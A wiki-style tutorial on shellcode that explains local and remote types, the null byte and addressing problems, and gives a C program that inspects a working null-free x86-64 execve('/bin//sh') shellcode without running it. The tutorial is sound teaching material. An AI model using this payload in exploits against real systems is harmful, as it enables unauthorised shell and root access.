Shellcode (eng)

From FdIwiki ELP

Shellcode is a small piece of machine code prepared to be injected into a running program and executed directly in memory, by exploiting a vulnerability found in the software.

When writing it, we must pay special attention to size and optimization, because the space available to place it is normally quite limited.

It is generally used to execute a shell with root (administrator) privileges, to manipulate the user and password files (change passwords, add privileged users, ...), and so on.

Types of shellcode

  • Local: does not establish any network connection and is used only for a local purpose on the affected machine. An example is the many shellcodes that allow privilege escalation.
  • Remote: once executed, it originates a connection (in either direction) with the attacker's machine. An example is a reverse shell from the exploited machine back to the attacking machine.

Problems when programming shellcode

Apart from the space the shellcode occupies, there are two points we must keep in mind: null bytes (the null byte problem) and memory addressing (the addressing problem).

  • Null byte problem: the most common way to inject shellcode is through functions used for string operations (strcpy and friends). These functions stop at the first null byte (0x00), so we must be careful not to have any such byte in our shellcode; otherwise the copy ends there, the rest of the payload never arrives, and our objective is not achieved.
  • Addressing problem: we want to inject our code into a program when it is launched, so we must first know the memory addresses of the elements we will use (for instance where our injected code will sit, or where a string it references lives).
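As an added example (not code from the original page), the C program below makes both problems concrete. It holds three x86-64 byte sequences constructed and hand-assembled for this example: "mov eax, 0" (which encodes with four null bytes), the equivalent "xor eax, eax" (none), and a classic null-free Linux execve("/bin//sh") shellcode. It then checks each payload for null bytes and simulates delivery through strcpy() to show how many bytes actually land. The shellcode is not executed; it is only inspected. The execve payload also illustrates one answer to the addressing problem: it pushes the "/bin//sh" string onto the stack and takes its address from rsp at run time, so no absolute address needs to be known beforehand. The function names first_null and bytes_delivered are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Constructed for this example: two x86-64 encodings of "set eax to 0".
 * mov eax, 0 assembles to b8 00 00 00 00 (four null bytes);
 * xor eax, eax assembles to 31 c0 (none). */
static const unsigned char mov_eax_zero[] = { 0xb8, 0x00, 0x00, 0x00, 0x00 };
static const unsigned char xor_eax_eax[]  = { 0x31, 0xc0 };

/* Linux x86-64 execve("/bin//sh", NULL, NULL), hand-assembled, null-free.
 * The string is built on the stack and its address taken from rsp, so the
 * payload does not depend on knowing any absolute address in advance. */
static const unsigned char execve_sh[] = {
    0x48, 0x31, 0xf6,                   /* xor  rsi, rsi   (argv = NULL)     */
    0x56,                               /* push rsi        (string terminator) */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, /* movabs rdi, "/bin//sh"            */
                0x2f, 0x2f, 0x73, 0x68,
    0x57,                               /* push rdi        (string on stack) */
    0x54,                               /* push rsp                           */
    0x5f,                               /* pop  rdi        (rdi = &"/bin//sh")*/
    0x6a, 0x3b,                         /* push 0x3b                          */
    0x58,                               /* pop  rax        (rax = SYS_execve) */
    0x99,                               /* cdq             (rdx = envp = NULL)*/
    0x0f, 0x05                          /* syscall                            */
};

/* Offset of the first null byte in the payload, or -1 if it is null-free. */
int first_null(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (int)i;
    return -1;
}

/* Simulate delivery through strcpy(): copy the payload as a C string into a
 * target buffer and report how many bytes actually arrive. Everything after
 * the first null byte is silently dropped, which is the null byte problem. */
size_t bytes_delivered(const unsigned char *code, size_t len)
{
    char src[64], dst[64];
    if (len >= sizeof src)
        return 0;                       /* payload too large for this demo */
    memcpy(src, code, len);
    src[len] = '\0';                    /* the terminator strcpy() stops on */
    strcpy(dst, src);
    return strlen(dst);
}

static void report(const char *name, const unsigned char *code, size_t len)
{
    printf("%-15s %2zu bytes, first null at %2d, %2zu delivered by strcpy\n",
           name, len, first_null(code, len), bytes_delivered(code, len));
}

int main(void)
{
    report("mov eax,0",      mov_eax_zero, sizeof mov_eax_zero);
    report("xor eax,eax",    xor_eax_eax,  sizeof xor_eax_eax);
    report("execve /bin/sh", execve_sh,    sizeof execve_sh);
    return 0;
}
```

Running it shows the "mov eax, 0" variant truncated to a single byte after strcpy(), while the xor form and the 23-byte execve payload arrive intact. The same check (scan the assembled bytes for 0x00 before use) is the first thing to run on any shellcode that will travel through a string function; the usual fixes are exactly the kind of substitution shown here (xor instead of mov with an immediate zero, push/pop instead of mov with a small immediate, cdq to zero rdx).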

Interesting tools